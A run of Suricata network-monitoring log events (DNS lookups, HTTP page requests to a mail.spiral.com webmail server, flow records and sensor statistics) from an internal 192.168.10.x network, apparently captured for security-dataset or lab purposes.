{"timestamp":"2020-02-29T00:18:22.255851+0000","flow_id":773543705896811,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18162,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:22.365114+0000","flow_id":773543705896811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59659,"proto":"UDP","dns":{"type":"answer","id":18162,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:22.365114+0000","flow_id":773543705896811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59659,"proto":"UDP","dns":{"type":"answer","id":18162,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:22.471951+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5341}} {"timestamp":"2020-02-29T00:18:25.000682+0000","flow_id":780334029631261,"event_type":"flow","src_ip":"192.168.10.122","src_port":36750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:24.749341+0000","end":"2020-02-29T00:13:24.857976+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:27.000505+0000","flow_id":607027817694435,"event_type":"flow","src_ip":"192.168.10.130","src_port":34862,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":25,"bytes_toserver":2523,"bytes_toclient":23669,"start":"2020-02-29T00:16:49.869603+0000","end":"2020-02-29T00:17:26.378585+0000","age":37,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:18:27.477985+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34874,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5341},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":25658,"tx_id":2}} {"timestamp":"2020-02-29T00:18:28.000172+0000","event_type":"stats","stats":{"uptime":14760,"capture":{"kernel_packets":136522,"kernel_drops":0},"decoder":{"pkts":136536,"bytes":93805419,"invalid":192,"ipv4":135005,"ipv6":10,"ethernet":136536,"raw":0,"null":0,"sll":0,"tcp":129572,"udp":5226,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2392,"failed_udp":112},"tx":{"http":4718,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2472}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2447,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19511,"memcap_state":0,"memcap_global":0},"http":{"memuse":35606,"memcap":0}}} {"timestamp":"2020-02-29T00:18:29.000745+0000","flow_id":2225289892430090,"event_type":"flow","src_ip":"192.168.10.81","src_port":52768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":16,"bytes_toserver":2090,"bytes_toclient":15483,"start":"2020-02-29T00:17:19.098570+0000","end":"2020-02-29T00:17:28.722052+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:18:32.000589+0000","flow_id":1353815243338707,"event_type":"flow","src_ip":"192.168.10.122","src_port":42553,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:31.570323+0000","end":"2020-02-29T00:13:31.678579+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:32.000791+0000","flow_id":400710460705573,"event_type":"flow","src_ip":"192.168.10.122","src_port":45826,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:31.396069+0000","end":"2020-02-29T00:13:31.504125+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:33.000326+0000","flow_id":1579541559988013,"event_type":"flow","src_ip":"192.168.10.130","src_port":34866,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":9,"pkts_toclient":12,"bytes_toserver":1099,"bytes_toclient":9575,"start":"2020-02-29T00:17:27.151341+0000","end":"2020-02-29T00:17:32.580593+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:18:35.000167+0000","event_type":"stats","stats":{"uptime":14767,"capture":{"kernel_packets":136534,"kernel_drops":0},"decoder":{"pkts":136538,"bytes":93805551,"invalid":192,"ipv4":135007,"ipv6":10,"ethernet":136538,"raw":0,"null":0,"sll":0,"tcp":129574,"udp":5226,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2392,"failed_udp":112},"tx":{"http":4718,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2472}},"flow_mgr":{"closed_pruned":2793,"new_pruned":17,"est_pruned":2450,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18849,"memcap_state":0,"memcap_global":0},"http":{"memuse":35526,"memcap":0}}} {"timestamp":"2020-02-29T00:18:42.000226+0000","event_type":"stats","stats":{"uptime":14774,"capture":{"kernel_packets":136534,"kernel_drops":0},"decoder":{"pkts":136538,"bytes":93805551,"invalid":192,"ipv4":135007,"ipv6":10,"ethernet":136538,"raw":0,"null":0,"sll":0,"tcp":129574,"udp":5226,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2392,"failed_udp":112},"tx":{"http":4718,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2472}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2450,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18849,"memcap_state":0,"memcap_global":0},"http":{"memuse":35526,"memcap":0}}} {"timestamp":"2020-02-29T00:18:43.889571+0000","flow_id":110173123482339,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49631,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15827,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:43.998032+0000","flow_id":110173123482339,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49631,"proto":"UDP","dns":{"type":"answer","id":15827,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:43.998032+0000","flow_id":110173123482339,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49631,"proto":"UDP","dns":{"type":"answer","id":15827,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:44.564099+0000","flow_id":1980751639961820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202}} {"timestamp":"2020-02-29T00:18:47.000298+0000","flow_id":302931236246879,"event_type":"flow","src_ip":"192.168.10.122","src_port":36289,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:46.283999+0000","end":"2020-02-29T00:13:46.392737+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:49.000216+0000","event_type":"stats","stats":{"uptime":14781,"capture":{"kernel_packets":136545,"kernel_drops":0},"decoder":{"pkts":136557,"bytes":93815974,"invalid":192,"ipv4":135026,"ipv6":10,"ethernet":136557,"raw":0,"null":0,"sll":0,"tcp":129591,"udp":5228,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2811,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2827,"synack":2818,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1848,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2393,"failed_udp":112},"tx":{"http":4719,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2473}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2451,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18848,"memcap_state":0,"memcap_global":0},"http":{"memuse":121149,"memcap":0}}} {"timestamp":"2020-02-29T00:18:49.566853+0000","flow_id":1980751639961820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52774,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":48903,"tx_id":0}} {"timestamp":"2020-02-29T00:18:51.102531+0000","flow_id":1992764664025219,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52667,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31596,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:51.207491+0000","flow_id":1992764664025219,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52667,"proto":"UDP","dns":{"type":"answer","id":31596,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:51.207491+0000","flow_id":1992764664025219,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52667,"proto":"UDP","dns":{"type":"answer","id":31596,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:51.299739+0000","flow_id":2049226304089160,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34876,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608}} {"timestamp":"2020-02-29T00:18:52.000255+0000","flow_id":720204489272861,"event_type":"flow","src_ip":"192.168.10.122","src_port":37890,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:51.634397+0000","end":"2020-02-29T00:13:51.742601+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:54.000424+0000","flow_id":902968232767834,"event_type":"flow","src_ip":"192.168.10.122","src_port":38101,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:53.127322+0000","end":"2020-02-29T00:13:53.235775+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:55.950562+0000","flow_id":171140185030946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35507,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54231,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:56.000204+0000","event_type":"stats","stats":{"uptime":14788,"capture":{"kernel_packets":136566,"kernel_drops":0},"decoder":{"pkts":136580,"bytes":93823981,"invalid":192,"ipv4":135045,"ipv6":10,"ethernet":136580,"raw":0,"null":0,"sll":0,"tcp":129608,"udp":5230,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2812,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2828,"synack":2819,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1849,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2394,"failed_udp":112},"tx":{"http":4720,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2474}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2453,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18777,"memcap_state":0,"memcap_global":0},"http":{"memuse":53216,"memcap":0}}} {"timestamp":"2020-02-29T00:18:56.058921+0000","flow_id":171140185030946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35507,"proto":"UDP","dns":{"type":"answer","id":54231,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:56.058921+0000","flow_id":171140185030946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35507,"proto":"UDP","dns":{"type":"answer","id":54231,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:56.259004+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7071}} {"timestamp":"2020-02-29T00:18:56.301097+0000","flow_id":2049226304089160,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34876,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20700,"tx_id":0}} {"timestamp":"2020-02-29T00:18:58.000810+0000","flow_id":1485649266158063,"event_type":"flow","src_ip":"192.168.10.122","src_port":43502,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:57.600559+0000","end":"2020-02-29T00:13:57.709068+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:00.241682+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7071},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38215,"tx_id":0}} {"timestamp":"2020-02-29T00:19:00.250216+0000","flow_id":1273696944968040,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38608,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":55762,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:00.358727+0000","flow_id":1273696944968040,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38608,"proto":"UDP","dns":{"type":"answer","id":55762,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:00.358727+0000","flow_id":1273696944968040,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38608,"proto":"UDP","dns":{"type":"answer","id":55762,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:00.445730+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3984}} {"timestamp":"2020-02-29T00:19:03.000378+0000","event_type":"stats","stats":{"uptime":14795,"capture":{"kernel_packets":136608,"kernel_drops":0},"decoder":{"pkts":136618,"bytes":93839609,"invalid":192,"ipv4":135083,"ipv6":10,"ethernet":136618,"raw":0,"null":0,"sll":0,"tcp":129642,"udp":5234,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2813,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2829,"synack":2820,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1850,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2396,"failed_udp":112},"tx":{"http":4722,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2476}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2454,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18850,"memcap_state":0,"memcap_global":0},"http":{"memuse":52604,"memcap":0}}} {"timestamp":"2020-02-29T00:19:03.009191+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3984},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19150,"tx_id":1}} {"timestamp":"2020-02-29T00:19:03.020774+0000","flow_id":97064884588838,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42079,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5765,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 